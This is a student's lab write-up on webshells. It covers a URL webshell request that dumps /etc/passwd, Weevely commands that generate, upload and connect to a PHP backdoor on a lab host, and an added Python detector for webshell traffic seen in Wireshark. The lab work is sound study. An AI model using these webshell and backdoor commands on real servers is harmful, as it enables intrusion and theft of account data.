Using the URL webshell method as shown in Assignment 7.1, I invoked a webshell to dump the contents of /etc/passwd on the Pippin target system.
I ran a Wireshark capture during the dump and was able to view the contents of the dump in the TCP stream.
Note: In Wireshark the reassembled stream is opened by right-clicking a packet from the connection and choosing Follow > TCP Stream; for a plain URL webshell the command sits in the request's query string and the output comes back in the HTTP response body, so both are readable in that view.
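The following is an added example (not part of the lab or of any course material) showing what a defender can do with exactly the text that Follow > TCP Stream displays: it splits a reassembled request/response pair, pulls the command out of the query string, and checks whether the response body is a dump of /etc/passwd. The sample stream, the shell path /upload/shell.php and the parameter name cmd are constructed for illustration; the host address is taken from the lab. The same checks apply to the recon commands run later in the lab (whoami, id), which is why the command list includes them.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample of a "Follow > TCP Stream" view for a one-parameter
# URL webshell. Path and parameter name are illustrative, not from the lab.
SAMPLE_STREAM = (
    "GET /upload/shell.php?cmd=cat+/etc/passwd HTTP/1.1\r\n"
    "Host: 10.0.5.25\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)

# Query-string names commonly used by one-line PHP webshells (assumed list).
SHELL_PARAMS = ("cmd", "c", "command", "exec", "execute")

# First words of commands typically run right after landing a webshell.
RECON_COMMANDS = ("whoami", "id", "uname", "cat", "ls", "pwd")

# One /etc/passwd record: name:passwd:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(
    r"^([a-z_][a-z0-9_-]*):[^:]*:(\d+):(\d+):[^:]*:[^:]*:[^:]*$"
)


def split_stream(stream):
    """Split a reassembled stream into (request_headers, response_body).

    A GET request carries no body, so the response starts right after the
    request's blank line; the response body starts after its own blank line.
    """
    request, _, rest = stream.partition("\r\n\r\n")
    _, _, response_body = rest.partition("\r\n\r\n")
    return request, response_body


def extract_command(request):
    """Return (param_name, command) if the request line carries a shell parameter."""
    request_line = request.split("\r\n", 1)[0]
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    query = urlsplit(parts[1]).query
    # parse_qs turns '+' into a space and decodes %XX escapes for us.
    for name, values in parse_qs(query).items():
        if name.lower() in SHELL_PARAMS:
            return name, values[0]
    return None


def passwd_accounts(body):
    """Return (name, uid) for every response line that parses as a passwd record."""
    hits = []
    for line in body.splitlines():
        m = PASSWD_LINE.match(line)
        if m:
            hits.append((m.group(1), int(m.group(2))))
    return hits


def analyze_stream(stream):
    """Summarise one webshell exchange the way a detection rule would."""
    request, body = split_stream(stream)
    found = extract_command(request)
    accounts = passwd_accounts(body)
    command = found[1] if found else None
    return {
        "param": found[0] if found else None,
        "command": command,
        "recon": command is not None and command.split()[0] in RECON_COMMANDS,
        "passwd_accounts": accounts,
        "root_exposed": any(uid == 0 for _, uid in accounts),
        # Alert when a command parameter is present and the reply looks like
        # a file the web server should never be serving.
        "alert": found is not None and bool(accounts),
    }


if __name__ == "__main__":
    print(analyze_stream(SAMPLE_STREAM))
```

Run against the constructed stream this reports the decoded command, flags it as recon, lists the three accounts and sets root_exposed because uid 0 appears in the reply. The same split-and-inspect logic can be applied to any stream exported from Wireshark (File > Export Packet Dissections, or the text from the Follow window), which is the defender's view of the attack the lab performs.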
Weevely Webshell Wireshark Capture
Weevely is a tool that generates a PHP agent (a webshell) and, once that agent has been placed on a web server, connects to it over HTTP to provide a terminal-like session in which commands are executed on the remote system.
Before using weevely, I had to create a PHP agent. I did this with the command: weevely generate PASSWORDGOESHERE zmorbackdoor.php
Once this agent is on the target, weevely can connect to it and invoke the webshell remotely; the password given at generation time is what the client must supply to use it.
I then used FTP to upload the zmorbackdoor.php file onto the target host. The method I used is outlined in Lab 7.1.
I then used the command weevely http://10.0.5.25/upload/zmorbackdoor.php PASSWORDGOESHERE to get access to the webshell.
I then ran some commands such as whoami, id, and cat /etc/os-release while running a Wireshark capture and was able to see the commands and outputs in the TCP stream.
Reflection:
This lab taught me about the use of weevely. I also realize how much of a threat webshells can pose as a vulnerability. On top of this, I learned how Wireshark can be used to intercept packets generated by webshell use so that their contents can be seen, which could also be concerning if used maliciously.